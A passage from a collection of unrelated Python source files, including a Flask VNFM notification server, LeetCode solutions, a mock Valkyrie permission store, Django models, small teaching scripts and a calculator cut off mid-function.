    return 'OK'

def vnfm_handle_ingressGatewayJoin(container, interface, port):
    # Thread target: register the ingress gateway with the VNFM.
    vnfm.handle_RouterJoin(container, interface, port)

@front_app.route('/iGW/notifications/iGW_UP', methods=['POST'])
def handle_iGW_up():
    logger.debug("iGW UP notification received")
    router_infos = json.loads(request.data)
    container = router_infos[u'container']
    interface = router_infos[u'listening_interface']
    port = router_infos[u'listening_port']
    Thread(target=vnfm_handle_ingressGatewayJoin, args=[container, interface, port]).start()
    logger.debug("sending ACK for iGW")
    return 'OK'

def vnfm_handle_RouterJoin(container, interface, port):
    # Thread target: register a plain router with the VNFM.
    vnfm.handle_RouterJoin(container, interface, port)

@front_app.route('/router/notifications/router_UP', methods=['POST'])
def handle_vnf_up():
    logger.debug("vnf UP notification received")
    router_infos = json.loads(request.data)
    container = router_infos[u'container']
    interface = router_infos[u'listening_interface']
    port = router_infos[u'listening_port']
    Thread(target=vnfm_handle_RouterJoin, args=[container, interface, port]).start()
    return 'OK'
def notifyNFVO():
    # Thread target: tell the NFVO this VNFM is up.
    logger.debug('sending VNFM UP notification to NFVO')
    vnfm.nfvo_client.notify_nfvo()

@back_app.route('/nfvo/notifications/nfvoUP')
def nfvoUP():
    logger.debug("NFVO UP notification received")
    Thread(target=notifyNFVO).start()
    return 'OK'

@back_app.route('/nfvo/faces/configuration', methods=['POST'])
def initial_configuration():
    # Accept the initial VNF configuration exactly once; later posts are ignored.
    if not initial_configuration.received:
        logger.debug("VNFs initial configuration received from NFVO")
        data = json.loads(request.data)
        vnfm.set_managed_vnfs_list(data['vnfs_id'])
        # Everything except the vnfs_id list is per-VNF configuration.
        config = {key:data[key] for key in data.keys() if key != 'vnfs_id'}
        vnfm.embed_vnfs_initial_configuration(config)
        logger.debug(str(config))
        initial_configuration.received = True
    else:
        logger.debug("initial configuration already received")
    return 'OK'
# Function attribute used as the once-only flag for the handler above.
initial_configuration.received=False
@back_app.route('/nfvo/firewall/update', methods=['POST'])
def update_firewall():
    # Push an updated prefix list to one VDU's firewall.
    data = json.loads(request.data)
    vnfm.update_firewall_config(data["vdu_id"], data['prefix_list'])
    logger.debug(str(data))
    # NOTE(review): setting the initial-configuration flag here looks like a
    # copy/paste leftover from initial_configuration() — confirm intent.
    initial_configuration.received = True
    return 'OK'

@front_app.route('/doctor/MMTenant/report', methods=['POST'])
def mmt_report():
    # Monitoring report from the MMT probe, dispatched to the NFVO by alert id.
    data = request.values.to_dict()['data']
    data = json.loads(data)
    data["ip"]=request.remote_addr
    logger.debug(str(data))
    print data
    if data['alert_id'] == 102:
        vnfm.nfvo_client.forward_cpa_alert(data)
    elif data['alert_id'] == 103:
        logger.debug(data)
        vnfm.nfvo_client.forward_pit_stats_in(data)
    return 'OK'
def forward_sv_report(data):
    # Thread target: relay an SV report to the NFVO.
    vnfm.nfvo_client.forward_sv_report(data)

@front_app.route('/sv/report', methods=['POST'])
def handle_sv_report():
    logger.debug("SV notification received")
    data = json.loads(request.data)
    Thread(target=forward_sv_report, args=(data, )).start()
    return 'OK'

def update_service(config):
    # Thread target: reconfigure the service after a container went down.
    vnfm.update_service(config['container_down'],
                        config['ingress_configurations'],
                        config['replicas_configurations'])

@back_app.route('/nfvo/update_service', methods=['POST'])
def handle_update_service():
    data = json.loads(request.data)
    Thread(target=update_service, args=(data, )).start()
    return 'OK'

def finish_scale_out(config):
    # Thread target: complete a scale-out operation.
    vnfm.finish_scale_out(config['container_down'],
                          config['ingress_configurations'],
                          config['replicas_configurations'])

@front_app.route('/router/notifications/finish_scale_out', methods=['POST'])
def handle_finish_scale_out():
    data = json.loads(request.data)
    Thread(target=finish_scale_out, args=(data, )).start()
    return 'OK'
def update_faces(data):
    # Thread target: push a face update to one managed router.
    router_id = data['router_id']
    faces = data['faces']
    vnfm.vnf_clients[router_id].send_update_faces(faces)

@back_app.route('/nfvo/update_faces', methods=['POST'])
def handle_update_faces():
    data = json.loads(request.data)
    Thread(target=update_faces, args=(data, )).start()
    return 'OK'

def update_router_mode(router_mode):
    # Thread target: switch one router's operating mode.
    router_id = router_mode['router_id']
    mode = router_mode['router_mode']
    vnfm.vnf_clients[router_id].send_update_mode(mode)

@back_app.route('/nfvo/update_router_mode', methods=['POST'])
def handle_update_router_mode():
    data = json.loads(request.data)
    Thread(target=update_router_mode, args=(data, )).start()
    return 'OK'

def start_front_app():
    # VNF-facing app on the overlay network, fixed port 4999.
    logger.debug("starting VNFM server on admin_net(VNFM<-->VNFs)")
    front_app.run(host=vnfm_overlay_ip, port=4999, debug=False)

def start_back_app():
    # NFVO-facing app on the bridge network, port from argv.
    logger.debug("starting VNFM server on bridge_net (VNFM<-->NFVO)")
    back_app.run(host=vnfm_bridge_ip, port=vnfm_port, debug=False)

if __name__ == '__main__':
    # Back app runs in a worker thread; front app blocks the main thread.
    Thread(target=start_back_app).start()
    start_front_app()
"""
if __name__ == '__main__':
    app.run(host=vnfm_host, port=vnfm_port, use_reloader=False)
"""
|
# Definition for singly-linked list.
# class ListNode:
#     def __init__(self, x):
#         self.val = x
#         self.next = None
class Solution:
    # @param A : head node of linked list
    # @param B : head node of linked list
    # @return the head node in the linked list
    def addTwoNumbers(self, A, B):
        """Add two non-negative numbers stored as linked lists, least
        significant digit first, writing the result into the longer list
        in place and returning its head."""
        def get_len(head):
            # Count the nodes of the list starting at `head`.
            length = 0
            current = head
            while current:
                length += 1
                current = current.next
            return length
        # An empty operand contributes nothing: return the other list.
        if not A:
            return B
        if not B:
            return A
        A_len, B_len = get_len(A), get_len(B)
        # Make A the longer list so the sum fits into it (plus at most one
        # extra node for a final carry).
        if B_len > A_len:
            A, B = B, A
        current_A, current_B = A, B
        carry = 0
        for i in range(max(A_len, B_len)):
            added = carry + current_A.val
            if current_B:
                added += current_B.val
                current_B = current_B.next
            current_A.val = added % 10
            # Bug fix: floor division. Plain `/` yields a float on Python 3,
            # turning every subsequent digit and the carry node into floats.
            carry = added // 10
            if current_A.next:
                current_A = current_A.next
            else:
                # End of the longer list: append a node for a leftover carry.
                if carry:
                    current_A.next = ListNode(carry)
        return A
|
"""
Model objects for the Valkyrie mimic.
"""
from __future__ import absolute_import, division, unicode_literals
import attr
from json import dumps
from mimic.util.helper import random_hex_generator
class AccountContactPermission(object):
    """
    An intersection object representing a certain contact's permissions on a certain account's items
    """
    # Valkyrie numeric permission type -> permission name.
    permission_type_map = {
        6: "view_domain",
        4: "view_billing",
        14: "admin_product",  # device.admin
        10: "manage_users",
        8: "manage_certificates",
        19: "edit_firewall_config",
        2: "edit_ticket",
        18: "view_firewall_config",
        15: "account_admin",  # account.admin
        7: "edit_domain",
        13: "edit_product",  # device.admin
        3: "view_community",
        17: "view_reports",
        16: "move_manager",
        12: "view_product",  # device.observer
        11: "manage_contact",
        9: "upgrade_account",
        5: "edit_billing",
        1: "view_ticket"}
    # Item type id -> item category name.
    item_type_map = {
        1: "accounts",
        2: "devices"}

    def __init__(self, account_number, contact_id, permission_type, item_id, item_type_id):
        """
        Constructor. Unmapped permission/item-type ids are named "unknown".
        """
        self.account_number = account_number
        self.contact_id = contact_id
        self.permission_type = permission_type
        self.permission_name = self.permission_type_map.get(self.permission_type, "unknown")
        self.item_id = item_id
        self.item_type_id = item_type_id
        self.item_type_name = self.item_type_map.get(self.item_type_id, "unknown")

    def json(self):
        """
        Create a JSON representation of self
        """
        return {
            "account_number": self.account_number,
            "contact_id": self.contact_id,
            "permission_type": self.permission_type,
            "permission_name": self.permission_name,
            "item_id": self.item_id,
            "item_type_id": self.item_type_id,
            "item_type_name": self.item_type_name
        }
@attr.s
class ValkyrieStore(object):
    """
    Extremely barebones Valkyrie backing store with some direct, static permissions.
    No create or delete permissions endpoints are implemented.
    No logic for determining effective permissions from indirect permissions is present.
    A GET on the following URI, for example, should always return four effective permissions:
    http://localhost:8900/valkyrie/v2/account/123456/permissions/contacts/devices/by_contact/12/effective
    ...while a GET on this URI should return one:
    http://localhost:8900/valkyrie/v2/account/123456/permissions/contacts/devices/by_contact/56/effective
    """
    valkyrie_store = attr.ib(default=attr.Factory(list))
    # Static permission fixtures; class-level, so shared by every instance.
    permissions = []
    # Arguments are: account, contact, (direct) permission, item, item_type (1=account or 2=device)
    permissions.append(AccountContactPermission(123456, 12, 12, 256, 2))
    permissions.append(AccountContactPermission(123456, 12, 12, 4096, 2))
    permissions.append(AccountContactPermission(123456, 12, 13, 16384, 2))
    permissions.append(AccountContactPermission(123456, 12, 14, 65536, 2))
    permissions.append(AccountContactPermission(123456, 34, 15, 123456, 1))
    permissions.append(AccountContactPermission(123456, 56, 12, 256, 2))
    permissions.append(AccountContactPermission(654321, 78, 14, 262144, 2))
    permissions.append(AccountContactPermission(654321, 90, 12, 1048576, 2))
    permissions.append(AccountContactPermission(654321, 90, 15, 654321, 1))

    def create_token(self, request):
        """
        Create an auth token without even interrogating the POSTed credential data
        """
        request.setResponseCode(200)
        token = {"X-Auth-Token": str(random_hex_generator(16))}
        return dumps(token)

    def get_permissions(self, request, account_number, contact_id, item_type):
        """
        Retrieve the permissions (if any) belonging to the given account,
        contact, and item type (item_type=1 -> accounts, item_type=2 -> devices).
        A None item_type matches both item types.
        """
        pm = [p for p in self.permissions if (p.account_number == account_number and
                                              p.contact_id == contact_id and
                                              (item_type is None or p.item_type_id == item_type))]
        response_message = {"contact_permissions": []}
        for p in pm:
            response_message['contact_permissions'].append(p.json())
        return dumps(response_message)
|
# Docstring (__doc__) is short for documentation string
# A docstring is always written with """
# It's the first string that occurs as a statement in a module, function, class or method definition
def double(num):
    """Return the given value doubled."""
    doubled = 2 * num
    return doubled
|
# Train a tiny dense network on the logical-AND truth table.
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
# Seed TF's RNG so weight initialisation (and hence the fit) is repeatable.
tf.random.set_seed(1)
X=np.array([[0,0],[0,1],[1,0],[1,1]]) #0=False, 1=True
y=np.array([0,0,0,1])  # AND of the two inputs
print(X.shape)
# Three Dense layers with no activation, so the whole model is linear and
# is fitted as a regression. NOTE(review): a sigmoid output would be the
# usual choice for a boolean target -- confirm this is intentional.
model = keras.Sequential([
    keras.layers.Dense(4, input_shape=(X.shape[1],)),
    keras.layers.Dense(8),
    keras.layers.Dense(1)
])
model.compile(loss="mse") #Mean Square Error
model.summary()
model.fit(X, y, epochs=100, batch_size=1)
# Raw regression outputs; thresholding at 0.5 turns them into booleans.
res = model.predict(X)
print(res)
print(res > 0.5)
|
#!/usr/bin/env python3
from threading import Thread, Condition
'''
1114. Print in Order
https://leetcode.com/problems/print-in-order/
'''
class Foo(object):
    """LeetCode 1114 "Print in Order": guarantee first() -> second() -> third()
    output order even when the three methods run on different threads.

    A single Condition guards ``order``, which records how far the sequence
    has progressed (0 = nothing done, 1 = first done, 2 = second done).
    """

    def __init__(self):
        self.exec_condition = Condition()
        self.order = 0
        # Predicates used with Condition.wait_for() by the later stages.
        self.first_finish = lambda: self.order == 1
        self.second_finish = lambda: self.order == 2

    def printFirst(self):
        print("First")

    def printSecond(self):
        print("Second")

    def printThird(self):
        print("Third")

    def first(self, printFirst):
        """
        :type printFirst: method
        :rtype: void
        """
        # printFirst() outputs "first". Do not change or remove this line.
        with self.exec_condition:
            printFirst()
            self.order = 1
            # Wake both potential waiters (second and third may be parked).
            self.exec_condition.notify(2)

    def second(self, printSecond):
        """
        :type printSecond: method
        :rtype: void
        """
        # printSecond() outputs "second". Do not change or remove this line.
        with self.exec_condition:
            # Fix: removed the stray debug `print(self.first_finish)` that
            # dumped the predicate lambda's repr into the expected output.
            self.exec_condition.wait_for(self.first_finish)
            printSecond()
            self.order = 2
            self.exec_condition.notify()

    def third(self, printThird):
        """
        :type printThird: method
        :rtype: void
        """
        # printThird() outputs "third". Do not change or remove this line.
        with self.exec_condition:
            self.exec_condition.wait_for(self.second_finish)
            printThird()
def GetFuncName(l, ll, order):
    """Reorder the two parallel lists by the 1-based indices in *order*.

    Returns a pair: (*l* reordered, *ll* reordered).
    """
    picked = [(l[idx - 1], ll[idx - 1]) for idx in order]
    orderList = [pair[0] for pair in picked]
    funcNameList = [pair[1] for pair in picked]
    return orderList, funcNameList
if __name__ == "__main__" :
    f = Foo()
    # Plain print callbacks and the order-enforcing wrapper methods,
    # kept as parallel lists so they can be paired up by index.
    l = [f.printFirst, f.printSecond, f.printThird]
    ll = [f.first, f.second, f.third]
    # Deliberately scrambled start order (1st, 3rd, 2nd) to exercise the
    # condition-variable synchronisation in Foo.
    iList = [1, 3, 2]
    orderList, funcName = GetFuncName(l,ll, iList)
    '''
    f.first(f.printSecond)
    f.second(f.printFirst)
    f.third(f.printThird)
    '''
    # Each wrapper runs on its own thread; Foo forces the
    # First/Second/Third output order regardless of scheduling.
    Thread(target=funcName[0], args = (orderList[0],)).start()
    Thread(target=funcName[1], args = (orderList[1],)).start()
    Thread(target=funcName[2], args = (orderList[2],)).start()
|
class Value:
    """Data descriptor that stores a value net of the owner's commission.

    On assignment the owner instance's ``commission`` fraction is deducted;
    reading returns the stored (post-commission) amount.

    Fix: the original stored the value on the descriptor object itself, so
    every owner instance shared one amount. The value is now kept on the
    owner instance (a data descriptor still wins over the instance dict on
    attribute lookup, so storage under a private name is safe).
    """
    def __init__(self, amount=0):
        # Default returned before any assignment (and for class access).
        self.amount = amount
    def __get__(self, obj, obj_type):
        if obj is None:
            # Accessed on the class itself -> expose the default.
            return self.amount
        return getattr(obj, "_value_amount", self.amount)
    def __set__(self, obj, value):
        # Deduct the owner's commission at assignment time.
        obj._value_amount = value * (1 - obj.commission)
class Account:
    # ``amount`` is managed by the Value data descriptor: assignments are
    # stored net of this account's ``commission``.
    amount = Value()
    def __init__(self, commission):
        # Commission rate as a fraction (e.g. 0.2 == 20%).
        self.commission = commission
def _main():
    """Demo: a 20% commission turns a 200 deposit into 160."""
    demo_account = Account(0.2)
    demo_account.amount = 200
    print(demo_account.amount)
if __name__ == "__main__":
    _main()
|
# -*- coding: utf-8 -*-
# Author/student ID: 106111123
# Problem 1: classify an integer as a multiple of 3, of 5, of both, or neither.
# (The triple-quoted block below is an earlier flat if/elif solution, kept
# as reference; the prompts and messages are in Chinese.)
"""
num=int(input("請輸入一個整數:"))
if (num % 3 == 0) and (num % 5 == 0):
    print("%d 是三且五的倍數"%num)
elif num % 3 == 0:
    print("%d 是三的倍數"%num)
elif num % 5 == 0:
    print("%d 是五的倍數"%num)
else:
    print("%d 非三與五的倍數"%num)
input()
"""
# Nested-if variant of the same classification.
num=int(input("請輸入一個整數:"))
if (num % 3) == 0:
    if (num % 5) == 0:
        print("%d 是三且五的倍數"%num)
    else:
        print("%d 是三的倍數"%num)
else:
    if (num % 5) == 0:
        print("%d 是五的倍數"%num)
    else:
        print("%d 非三與五的倍數"%num)
# Final input() just keeps the console window open.
input()
#---------------------------------------
# Problem 2: sum every multiple of 3 in the inclusive range [a, b].
a=int(input("請輸入一個整數:"))
b=int(input("請輸入一個大於a的整數:"))
total=0
while a<=b:
    if a % 3 == 0:
        total = total+a
    a = a + 1
print("三倍數的總合為 %d" %(total))
input()
|
# -*- coding: utf-8 -*-
'''
Create students in the database from CSV rows read on stdin.
Usage:
cat /tmp/archivo.csv | PYTHONPATH="../../../python/model" python3 importStudents.py
'''
from model.connection import connection
from model.registry import Registry
import sys
if __name__ == '__main__':
    import inject
    #inject.configure()
    # Resolve the registry through the inject container and open a DB
    # connection from the 'dcsys' pool.
    r = inject.instance(Registry)
    conn = connection.Connection(r.getRegistry('dcsys'))
    con = conn.get()
    try:
        import createStudent
        import csv
        # Each stdin row must be exactly: name, lastname, dni, sn.
        reader = csv.reader(sys.stdin)
        for name, lastname, dni, sn in reader:
            print('\n\n{} {} {} {}'.format(name,lastname,dni,sn))
            createStudent.createStudent(con, dni, name, lastname, sn)
        # One commit after all rows: the import is all-or-nothing.
        con.commit()
    finally:
        # Always return the connection to the pool, even on failure.
        conn.put(con)
|
from big_xo.libs import *
class Player:
    """A human participant in the game, reachable through a bot chat."""

    def __init__(self, bot, chat_id, name='Human'):
        self.name = name
        self.player_type = None
        self.game = None
        self.bot = bot
        self.chat_id = chat_id

    def set_type(self, player_type):
        """Remember which side/mark this player uses."""
        self.player_type = player_type

    def set_game(self, game):
        """Attach the game this player participates in."""
        self.game = game

    def up(self):
        """Tell the human it is their turn, showing the current board."""
        print("HumanPlayer: up()")
        print(self.chat_id)
        print(self.bot)
        board_text = "Your turn\n{}".format(self.game.board.print_board())
        self.bot.sendMessage(
            chat_id=self.chat_id,
            text=board_text,
            parse_mode='Markdown'
        )

    def move(self, cell):
        """Forward the chosen cell to the game engine."""
        self.game.make_a_move(self.player_type, cell)
class AI:
    """Computer player that picks moves by scoring board windows.

    Relies on helpers star-imported from big_xo.libs (score_game,
    get_max_element_index_from_2d_matrix, find_best_move_within_window,
    get_total_scores, WINDOW_SIZE, np) -- presumably the board is a numpy
    array; TODO confirm against big_xo.libs.
    """
    def __init__(self, bot, chat_id, name="AI"):
        self.name = name
        self.player_type = None
        self.game = None
        self.bot = bot
        self.chat_id = chat_id
    def set_type(self, player_type):
        # Side/mark this AI plays as.
        self.player_type = player_type
    def set_game(self, game):
        self.game = game
    def up(self):
        # Called when it becomes the AI's turn.
        self.bot.sendMessage(
            chat_id=self.chat_id,
            text="{} has started thinking, wait for a couple of years, please.".format(self.name)
        )
        self.think()
    def think(self):
        # Score the board from both players' perspectives and locate the
        # highest-scoring WINDOW_SIZE x WINDOW_SIZE window for each.
        my_scores, opponent_scores = score_game(self.game.board.board, self.player_type)
        my_wi = get_max_element_index_from_2d_matrix(my_scores)
        opponent_wi = get_max_element_index_from_2d_matrix(opponent_scores)
        my_best_window = self.game.board.board[my_wi[0]: my_wi[0] + WINDOW_SIZE, my_wi[1]:my_wi[1] + WINDOW_SIZE]
        opponent_best_window = self.game.board.board[opponent_wi[0]: opponent_wi[0] + WINDOW_SIZE,
                               opponent_wi[1]:opponent_wi[1] + WINDOW_SIZE]
        # Best attacking move vs best blocking move (opponent's best reply).
        my_best = find_best_move_within_window(my_best_window, self.player_type)
        opponent_best = find_best_move_within_window(opponent_best_window, -1 * self.player_type)
        # Try each candidate on a scratch copy of the board and keep the
        # one with the better overall score differential.
        t_board = np.copy(self.game.board.board)
        t_board[my_best[0]] = self.player_type
        _, _, diff1 = get_total_scores(*score_game(t_board, self.player_type))
        t_board[my_best[0]] = 0
        t_board[opponent_best[0]] = self.player_type
        _, _, diff2 = get_total_scores(*score_game(t_board, self.player_type))
        t_board[opponent_best[0]] = 0
        if diff2 >= diff1:
            # Window-local coordinates -> absolute board coordinates.
            final_move = opponent_best[0][0] + opponent_wi[0], opponent_best[0][1] + opponent_wi[1]
        else:
            final_move = my_best[0][0] + my_wi[0], my_best[0][1] + my_wi[1]
        # Announce the move in 1-based coordinates.
        self.bot.sendMessage(
            chat_id=self.chat_id,
            text="{}: my move is {}".format(self.name, (final_move[0] + 1, final_move[1] + 1))
        )
        self.move(final_move)
    def move(self, cell):
        self.game.make_a_move(self.player_type, cell)
|
import discord
def getIdFromName(server : discord.Server, name : str) -> str:
    """Return the id of the first member named *name*, or "" if absent."""
    return next((member.id for member in server.members if member.name == name), "")
def getDiscriminatorFromName(server : discord.Server, name : str) -> str:
    """Return the discriminator of the first member named *name*, or ""."""
    return next((member.discriminator for member in server.members if member.name == name), "")
async def mention(client, dist, name : str, message : str) -> bool:
    """Send *message* to the channel, @-mentioning the member called *name*.

    Returns False when no member with that name exists, True otherwise.
    """
    member_id = getIdFromName(dist.server, name)
    if member_id == "":
        return False
    await client.send_message(dist, "<@" + member_id + "> " + message)
    return True
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
::
OpRayleighTest # cfg4-
ORayleighTest # oxrap-
ipython -i OpRayleighTest.py
"""
# Axis indices into the photon record arrays.
X,Y,Z=0,1,2
# Slots of each record: momentum/polarisation before and after the scatter.
OLDMOM,OLDPOL,NEWMOM,NEWPOL = 0,1,2,3
import os, numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
    # ok.npy : Opticks samples; cfg4.npy : Geant4 comparison samples.
    aa = np.load(os.path.expandvars("$TMP/RayleighTest/ok.npy"))
    bb = np.load(os.path.expandvars("$TMP/RayleighTest/cfg4.npy"))
    bins = 100
    # 6 x 2 subplot grid: top row = aa components, bottom row = bb components.
    nx = 6
    ny = 2
    # Post-scatter momentum (x,y,z) and polarisation (a,b,c) of each set.
    x0 = aa[:,NEWMOM,X]
    y0 = aa[:,NEWMOM,Y]
    z0 = aa[:,NEWMOM,Z]
    a0 = aa[:,NEWPOL,X]
    b0 = aa[:,NEWPOL,Y]
    c0 = aa[:,NEWPOL,Z]
    x1 = bb[:,NEWMOM,X]
    y1 = bb[:,NEWMOM,Y]
    z1 = bb[:,NEWMOM,Z]
    a1 = bb[:,NEWPOL,X]
    b1 = bb[:,NEWPOL,Y]
    c1 = bb[:,NEWPOL,Z]
    # (subplot index, quantity) pairs, one histogram each.
    qwns = [
        (1,x0),(2,y0),(3,z0),(4,a0),(5,b0),(6,c0),
        (7,x1),(8,y1),(9,z1),(10,a1),(11,b1),(12,c1)
    ]
    for i,q in qwns:
        plt.subplot(ny, nx, i)
        plt.hist(q, bins=bins)
    pass
    plt.show()
    #dyz, ye, ze = np.histogram2d(y, z, bins=(100,100))
    #extent = [ye[0], ye[-1], ze[0], ze[-1]]
    #plt.imshow(dyz.T, extent=extent, origin='lower')
    #plt.show()
|
# Basic Python demo: assignments, strings, multiple assignment and
# exponentiation.
counter = 100  # An integer assignment
miles = 1000.0  # A floating point
name = "John"  # A string
print(counter)
print(miles)
print(name)
print("Aum")
# Fix: "spostrophes" -> "apostrophes" in the demo string.
mystring = "Don't worry about apostrophes"
print(mystring)
hello = "hello"
world = "world"
helloworld = hello + " " + world
print(helloworld)
# Multiple assignment unpacks both values in one statement.
a, b = 3, 4
print(a, b)
print("a is :", a)
# ** is exponentiation.
squared = 7 ** 2
cubed = 2 ** 3
print(squared)
print(cubed)
|
import txt2hpo, sys
import pickle
import os
class HPO_Class:
    """One HPO ontology term: ids, names, definitions, relations and
    Chinese (CHPO) translations.

    Fix: the original used mutable default arguments ([] and {}), so all
    instances constructed without explicit values shared the same lists
    and dict. None-sentinels now give every instance fresh containers.
    """
    def __init__(self, _id=None, _name=None, _alt_id=None, _def=None,
                 _comment=None, _synonym=None, _xref=None, _is_a=None,
                 _alt_Hs=None, _chpo=None, _chpo_def=None):
        self._id = [] if _id is None else _id
        self._name = [] if _name is None else _name
        self._alt_id = [] if _alt_id is None else _alt_id
        self._def = [] if _def is None else _def
        self._comment = [] if _comment is None else _comment
        self._synonym = [] if _synonym is None else _synonym
        self._xref = [] if _xref is None else _xref
        self._is_a = [] if _is_a is None else _is_a
        # Relation sets, filled in elsewhere (not constructor arguments).
        self._father=set()
        self._child_self=set()
        self._alt_Hs = {} if _alt_Hs is None else _alt_Hs
        self._chpo = [] if _chpo is None else _chpo
        self._chpo_def = [] if _chpo_def is None else _chpo_def
#from CONFIG import *
#REALPATH = os.path.realpath(__file__).replace(__file__,'')
# Hard-coded install root (the commented lines above tried to derive it).
REALPATH='/home/zhangfeng/TXT2HPO/'
# Pre-built HPO term index: pickled mapping of HPO id -> HPO_Class.
HPOs=txt2hpo.loading(REALPATH+'/src/HPOdata.pk')
input_dir=sys.argv[1]  # free-text input file
chpo_dic_dir=REALPATH+'/src/chpo.txt'
split_punc_dir=REALPATH+'src/split_punc.txt'
rm_dir=REALPATH+'src/rmwords.txt'
rm_pro_dir=REALPATH+'src/rmwords_pro.txt'
output_dir=sys.argv[2]  # report output file
mapping_list_dir=REALPATH+'src/mapping_list.txt'
# Split the input text into candidate elements, then map them to HPO ids.
elements=txt2hpo.splitting(input_dir, HPOs, chpo_dic_dir, split_punc_dir, rm_dir)
hpos=txt2hpo.mapping(elements, mapping_list_dir, HPOs)
fo=open(output_dir,'w')
# (NOTE: the 'Givern' typo is part of the established output format.)
fo.write('#Givern_term\n')
fo.write(open(input_dir).read().replace('\n','')+'\n')
fo.write('#Interpreted_term\tHPOs\n')
# Collect each HPO id once, remembering the first element it came from.
old=set()
given_hpos=[]
i=0
while i<len(elements):
    if hpos[i] != ['None']:
        fo.write(elements[i]+'\t'+','.join(hpos[i])+'\n')
        for one in hpos[i]:
            if one not in old:
                old.add(one)
                given_hpos.append([one,i])
    i+=1
fo.write('#Given_HPO\tHPO_name\tHPO_name_cn\tElement\n')
# Emit one summary row per unique HPO id, with its Chinese name if known.
i=0
while i<len(given_hpos):
    hpo=given_hpos[i][0]
    element=elements[given_hpos[i][1]]
    if len(HPOs[hpo]._chpo )>0:
        chpo=HPOs[hpo]._chpo[0]
    else:
        chpo='无'
    fo.write(hpo+'\t'+HPOs[hpo]._name[0]+'\t'+chpo+'\t'+element+'\n')
    i+=1
|
"""
from finance import views
try:
# django 2.0
from django.urls import path
except:
# django 1.6
from django.conf.urls import url as path
urlpatterns = [
path('finance/finance/budgetslist/', views.budgetslist, name='budgetslist'),
path('finance/budgetslist/finance/importbudgets/<str:docname>/', views.budgetslist, name='budgetslist'),
path('finance/importbudgets/<int:docname>/', views.importbudgets, name='importbudgets'),
path('finance/importbudgets/<str:docname>/', views.importbudgets, name='importbudgets'),
path('export/orders_from_project/<int:project_id>/', views.orders_from_project),
]
"""
|
from django.db import models
from login.models import NcUser
# Notice board + dev-log board (one model serves both)
class NoticeDev(models.Model):
    # primary key
    id = models.AutoField(auto_created=True, primary_key=True)
    # The notice board and the dev-log board share this one model; rows are
    # told apart by board_name.
    noticedev_board_name = models.CharField(max_length=32, default='공지사항', verbose_name='게시판이름')
    noticedev_title = models.CharField(max_length=128, verbose_name='제목')
    noticedev_contents = models.TextField(verbose_name='글내용')
    # ForeignKey expresses a 1:N relation and is declared on the 'N' side.
    # Links each post to its (admin) author user.
    # on_delete=models.CASCADE: deleting the '1' side deletes all linked 'N' rows.
    # on_delete=models.PROTECT: the '1' side cannot be deleted while 'N' rows exist.
    noticedev_writer = models.ForeignKey('login.NcUser', on_delete=models.PROTECT, related_name='noticedev_writer', verbose_name='공지사항 작성자')
    # noticedev_regist_dttm = models.DateTimeField(auto_now_add=True, verbose_name='최초 등록시간')
    noticedev_regist_dttm = models.DateTimeField(auto_now_add=True, verbose_name='최초 등록시간')
    noticedev_update_dttm = models.DateTimeField(auto_now=True, verbose_name='최근 업데이트시간')
    # Non-negative integer field (view counter).
    # noticedev_hits = models.PositiveIntegerField(default=0, verbose_name='조회수')
    noticedev_hits = models.PositiveIntegerField(default=0, verbose_name='조회수')
    # Many-to-many with users; Django creates the join table automatically.
    # Because NcUser is referenced by several relations on this model
    # (writer and likes), related_name is required so the reverse accessors
    # don't clash; names are chosen from the 'N' side's point of view.
    noticedev_likes = models.ManyToManyField('login.NcUser', related_name='noticedev_likes',blank=True, verbose_name='좋아요')
    def __str__(self):
        return self.noticedev_title
    class Meta:
        db_table = 'nc_notice_noticedev'
        verbose_name = '공지사항 게시판'
        verbose_name_plural = '공지사항 게시판'
# Hit-counter model: one row per (ip, day, post) view.
class PostHits(models.Model):
    # primary key
    id = models.AutoField(auto_created=True, primary_key=True)
    # Viewer's IP address.
    # protocol='both': accepts both IPv4 and IPv6 values.
    # unpack_ipv4=False: keep IPv4-mapped IPv6 addresses as-is.
    # null=True: allow missing addresses.
    posthits_client_ip = models.GenericIPAddressField(protocol='both', unpack_ipv4=False, null=True, verbose_name='사용자 IP주소')
    posthits_date = models.DateField(auto_now_add=True, verbose_name='조회날짜')
    posthits_post = models.ForeignKey('NoticeDev', on_delete=models.CASCADE, verbose_name='조회수모델 게시글')
    def __str__(self):
        # Fix: __str__ must return a str; returning the related model
        # instance raised TypeError whenever this object was rendered.
        return str(self.posthits_post)
    class Meta:
        db_table = 'nc_notice_hits'
        verbose_name = '조회수'
        verbose_name_plural = '조회수'
|
def count(str1, str2):
    """Print and return the number of distinct characters common to both strings.

    Parameters
    ----------
    str1, str2 : str
        The strings to compare.

    Returns
    -------
    int
        Count of distinct shared characters (also printed, as before;
        the return value is a backward-compatible addition).
    """
    matched_characters = set(str1) & set(str2)
    print("No. of matching characters are : " + str(len(matched_characters)) )
    return len(matched_characters)
def main():
    """Driver: compare two sample digit strings."""
    first = '3592'
    second = '1572'
    count(first, second)
if __name__=="__main__":
    main()
|
class Solution:
    """LeetCode 224 'Basic Calculator': evaluate +, - and parentheses.

    Fixes over the original:
      * multi-digit numbers are accumulated (the old code treated every
        digit as its own operand, so '12+3' evaluated to 6);
      * a closing parenthesis now terminates the recursive call (previously
        ')' was ignored, so '2-(1+2)-3' evaluated to 2 instead of -4);
      * spaces are skipped.
    """

    def calculate(self, s: str) -> int:
        """Evaluate the expression string and return its integer value."""
        return self.eval(s, 0)[0]

    def eval(self, s, i):
        """Evaluate s from index i until end-of-string or a matching ')'.

        Returns (value, index just past the consumed span).
        """
        op = '+'
        res = 0
        while i < len(s):
            char = s[i]
            if char == ' ':
                i += 1
            elif char in ('+', '-'):
                op = char
                i += 1
            elif char == ')':
                i += 1  # consume ')' and hand control back to the caller
                break
            else:
                if char.isdigit():
                    # Accumulate the full multi-digit number.
                    val = 0
                    while i < len(s) and s[i].isdigit():
                        val = val * 10 + int(s[i])
                        i += 1
                else:  # '(' -- evaluate the sub-expression recursively
